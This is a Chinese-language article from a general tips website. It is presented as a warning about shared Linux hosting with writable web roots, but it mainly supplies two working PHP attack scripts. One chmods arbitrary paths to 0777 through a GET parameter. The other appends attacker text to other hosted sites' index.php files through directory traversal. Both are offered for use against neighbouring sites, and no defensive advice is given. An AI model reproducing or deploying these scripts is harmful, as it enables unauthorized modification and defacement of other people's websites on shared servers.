首页 > 常识 > 互联网 > 网站制作 > 数据安全

根目录有可写入权限 这样的设置不安全

作者:  时间:2016-05-15
描述:当我们拥有了一个linux下的shell(服务器上多个网站)。这个shell对所在站点的根目录有可写入权限,甚至能查看其他网站的目录。那么,这样的主机设置肯定是不安全的。
《生活宝典shenghuobaodian.com》讯  当我们拥有了一个linux下的shell(服务器上多个网站)。这个shell对所在站点的根目录有可写入权限,甚至能查看其他网站的目录。那么,这样的主机设置肯定是不安全的。
 
有的时候,我们想对获得同服务器的其他站的权限,比如直接对其他站点的index.php进行修改,却发现没有权限。
 
我们可以尝试通过以下脚本来实现对其他站点的文件添加权限。
 
代码:
 
<?php
$path = stripslashes($_GET['path']);
$ok = chmod ($path , 0777);
if ($ok == true)
echo " CHMOD OK , Permission editable file or directory. Permission to write";
?>
 
保存为chmod.PHP
 
使用方法简单,访问
 
http://site/chmod.php?path=../../其他站点的目录/index.php
 
这里的index.PHP是要修改权限的文件。
 
另外一个exploit:
 
把下面的代码保存为exploit.PHP
 
代码:
 
<?php
 
@$filename = stripslashes($_POST['filename']);
@$mess = stripslashes($_POST['mess']); 
$fp = @fopen("{$_POST['filename']}", 'a');
@fputs($fp,"$mess <hr size="1" color="black">");
@fclose($fp);
?>
 
<form name="form1" action="exploit.php" method="post">
<p align="center"><b>
<br>
CODE :<br>
<textarea name="mess" rows="3"></textarea></font></b></textarea>
</font></b> <p><input type="hidden" name="filename" value="../../AUTRE WEBSITE SUR LE MULTIHOSTING/index.php"></p>
<center>
<input type="reset" name="Submit" value="Delete">
<input name="go" type="submit" value="Send" onClick="javascript:this.style.visibility ='hidden';">
<center>
</form>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Changing CHMOD Permissions Exploit - Contact : the_gl4di4t0r[AT]hotmail[DOT]com</title>
</head>
<body>
</center>
</body>

从手机浏览器访问《生活宝典》

站内搜索
  • linux|chmod,chown,chgrp文件安全与权限
  • Linux 系统文件安全与权限
  • 浏览网页时保留在 cookie 里的密码安全吗?
  • 本地策略管理密码安全 提高系统安全性
  • 设置背景图代码
  • Adobe Flash Player 安全沙箱冲突
  • 软件后门(升级)程序为电脑带来安全风险
  • 清除临时文件:让电脑更安全 操作速度更快
  • 遵循正确的电脑开关机顺序是设备安全的需要
  • 帝国CMS网站管理系统多终端访问功能设置步骤
  • 微商帮
    世界网站大全
    中国科研团队:大象的长鼻子是如何越变越长了
    中国科研团队:大象的长
    自己是否能够像自己想的那样做成一件事,身旁人的判断会比自己准确
    自己是否能够像自己想
    火宫殿:吃喝玩乐看,烧香拜神佛,红火的庙会经济
    火宫殿:吃喝玩乐看,烧香
    眼见为实也不为实,更须谨慎看到的并非全貌
    眼见为实也不为实,更须